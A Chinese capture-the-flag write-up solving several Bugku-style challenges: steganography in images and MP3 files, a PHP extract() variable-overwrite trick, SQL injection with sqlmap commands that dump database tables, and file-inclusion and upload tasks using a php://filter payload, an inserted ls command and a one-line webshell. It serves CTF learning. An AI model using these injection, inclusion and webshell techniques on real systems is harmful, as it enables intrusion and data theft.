WriteUp-2019.5.29

发表于 | 更新于

爆照(08067CTF)

png图片

binwalk发现许多zip文件

如果使用dd命令一个一个分离太麻烦,所以使用foremost提取

得到这样一个压缩包

1557747205814

解压后根据文件头发现88、888、8888是jpg文件,将他们后缀都改为jpg

  • 88文件改后缀后得到一张二维码。扫描二维码得到:bilibili
  • 888文件修改后在详细信息内隐含着一个base64码:c2lsaXNpbGk=

​ 解码之后得到以下内容:silisili

  • 8888文件binwalk后发现里面内含另一个png文件,该文件为二维码,扫码得到以下内容:panama

综上得到 flag{bilibili_silisili_panama}

乌云邀请码

解压后得到png图片

用 Stegsolve查看图片的每个颜色通道,发现三原色的0位的左上角有点奇怪

打开Data Extract,更改Bit Plane Order发现flag

旋转跳跃

MP3文件,音频隐写题目

将MP3文件复制到MP3stego的目录下

打开cmd:decode.exe -X -P 密码 MP3文件名

随后解出一个txt文件,打开之后发现flag

web8

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
extract($_GET);
if (!empty($ac))
{
	$f = trim(file_get_contents($fn));
	if ($ac === $f)
	{
		echo "<p>This is flag:" ." $flag</p>";
	}
	else
	{
		echo "<p>sorry!</p>";
	}
}
?>

extract() 函数:使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。

file_get_contents()函数:把整个文件读入一个字符串中。

根据提示发现了flag.txt

进入发现内容只有“flags”

构造?ac=flags&fn=flag.txt

这是一个神奇的登陆框

输入0“发现异常,应该是sql注入

查看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<form action="" name="form1" method="post">
	<div >
	<!-- UserName : -->
	    <input class="op" type="text"  name="admin_name" value="" placeholder="Username"/>
	</div>
	<div style="margin-top:15px;">
	<!-- PassWord : -->
		<input class="op" type="password" name="admin_passwd" value="" placeholder="Password"/>
		<!--**************************************-->
		<!--23333-->
		<!--**************************************-->
	</div></br>
	<div style=" margin-top:-11px;">
		<input class="login" type="submit" name="submit" value="GO GO GO" />
	</div>
</form>

因为POST提交,所以需要先抓包,将包的内容复制到txt文件中,再sqlmap -r “D:\1.txt”

首先爆数据库 sqlmap -r “D:\1.txt” -p admin_name –dbs

(-p后加参数名,如果不带-p admin_name,sqlmap自动检测所有参数)

(第一次可能出现 all tested parameters appear to be not injectable. Try to increase ‘–level’/‘–risk’ values to perform more tests. Also, you can try to rerun by providing either a valid value for option ‘–string’ (or ‘–regexp’). 后加 –level 5可解决)

再以此爆出表、列、字段:

sqlmap.py -r “D:\1.txt” -D bugkusql1 -p admin_name –tables

sqlmap.py -r “D:\1.txt” -D bugkusql1 -T flag1 -p admin_name –columns

sqlmap.py -r “D:\1.txt” -D bugkusql1 -T flag1 -C flag1 -p admin_name –dump

文件包含2

看到?file=就联想到文件包含漏洞,构造

?file=php://filter/read=convert.base64-encode/resource=index.php

却得到大大的“NAIVE!!”

查看源码,发现了upload.php,进入发现这道题其实是文件上传

方法①

新建一个txt文件写入 后另存为 jpg 格式

上传jpg文件,提示“file upload successful!Save in: upload/201905211220577319.jpg”

进入upload/201905211220577319.jpg文件

因为插入了ls命令,可以显示出当前目录下所有文件

进入this_is_th3_F14g_154f65sd4g35f4d6f43.txt文件,发现flag

方法②

上传一句话木马,再用菜刀或蚁剑连接shell

但是暂未连接成功。。